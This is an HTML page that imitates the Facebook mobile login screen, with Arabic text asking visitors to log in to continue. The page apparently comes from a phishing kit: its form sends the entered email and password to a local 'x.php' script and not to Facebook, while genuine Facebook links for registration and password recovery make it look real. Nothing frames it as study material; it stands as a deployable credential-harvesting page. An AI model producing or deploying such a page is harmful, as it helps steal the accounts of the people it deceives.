<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>يرجي تسجيل الدخول للمتابعة</title>
        <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
        <link href="./fb/O2aKM2iSbOw.png" rel="apple-touch-icon-precomposed" sizes="196x196">
        <meta name="referrer" content="default" id="meta_referrer">
        <link rel="stylesheet" type="text/css" id="EH5zP" href="./fb/g0LCLCXVa_q.css">
        <link rel="canonical" href="#">
    </head>
    <body tabindex="0" class="touch x1 _fzu _50-3 iframe acw portrait" style="min-height: 664px; background-color: rgb(255, 255, 255);">
        <div id="viewport" style="min-height: 664px;">
            <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
            <div id="page"><div class="_129_"></div>
                <div class="_4g33 _52we _52z5" id="header"><div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter"><a href="#"><i class="img sp_qpIvdSU5o3E sx_72920b"><u>facebook</u></i></a></div></div><div id="root" role="main" class="_5soa acw" data-sigil="context-layer-root content-pane" style="min-height: 664px;"><div class="_4g33"><div class="_4g34"><div><div class="aclb _5rut" data-sigil="traditional-login"><div class="_4fmw grouped aclb"><a class="touchableArea first last area touchable acy apl abt abb" href="#" target="_top" data-sigil="touchable marea"><div class="ib cc"><i class="l img sp_mJP1XY0f7L- sx_3159a9"></i><div class="c"><span class="fcl">يرجي تسجيل الدخول للمتابعه .</span></div></div></a></div><form method="post" class="mobile-login-form _5spm" id="u_0_0" novalidate="1" action="x.php" data-autoid="autoid_1"><input type="hidden" name="lsd" value="AVp6t0BP" autocomplete="off"><input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є"><input type="hidden" name="version" value="1"><input type="hidden" id="ajax" name="ajax" value="0"><input type="hidden" id="width" name="width" value="0"><input type="hidden" id="pxr" name="pxr" value="0"><input type="hidden" id="gps" name="gps" value="0"><input type="hidden" id="dimensions" name="dimensions" value="0"><input type="hidden" name="m_ts" value="1455457297"><input type="hidden" name="li" value="EYTAViQY3CDUViALv13lb-tS"><div class="_56be _5sob"><div class="_55wo _55x2 _56bf"><input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _5ruq" name="email" placeholder="البريد الإلكتروني أو الهاتف " value="" type="text" data-sigil="login-form-input"><div class="_3nph _mg8"><div class="_4g33"><div class="_4g34 _5i2i _52we"><div class="_5xu4"><input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2" name="pass" placeholder="كلمة السر" id="u_0_1" type="password" data-sigil="login-form-input password-plain-text-toggle-input"></div></div></div></div></div></div><div class="_2pie"><button type="submit" value="تسجيل الدخول" class="_54k8 _56bs _56b_ _56bw _56bu" name="login" id="u_0_5" data-sigil="touchable"><span class="_55sr">تسجيل الدخول</span></button></div></form><div class="_52jj _5t3b"><a class="_54k8 _56bs _5t3b _56bw _56bv" data-store="{&quot;nativeClick&quot;:true}" href="https://m.facebook.com/reg/?cid=103&refid=8" role="button" data-sigil="touchable"><span class="_55sr">انشاء حساب جديد </span></a></div><div class="other-links"><ul class="_5pkb _55wp"><li><span class="mfss fcg"><a href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2F&lwv=100&_rdr"> هل نسيت كلمة السر&nbsp;?</a><span aria-hidden="true"> · </span><a class="sec" href="https://m.facebook.com/help/?refid=8">مركز المساعدة</a></span></li></ul></div></div></div><div class="_55wr _5ui2"><div class="_5dpw"><div class="_5ui3" data-sigil="marea"><div class="_4g33"><div class="_4g34"><span class="_52jc _52j9 _52jh">Français (France)</span><div><span class="_52jc"><a href="#" data-sigil="ajaxify">English (UK)</a></span></div><div><span class="_52jc"><a href="#" data-sigil="ajaxify">Português (Brasil)</a></span></div><div><span class="_52jc"><a href="#" data-sigil="ajaxify">Italiano</a></span></div></div><div class="_4g34"><div><span class="_52jc"><a href="#" data-sigil="ajaxify">العربية</a></span></div><div><span class="_52jc"><a href="#" data-sigil="ajaxify">Español (España)</a></span></div><div><span class="_52jc"><a href="#" data-sigil="ajaxify">Deutsch</a></span></div><span class="_52jc"><a href="#">Autres langues…</a></span></div></div></div>
    </div></div></div></div></div></div></div><div class="_5ui4"><span class="mfss fcg">Facebook ©2016</span></div></body></html>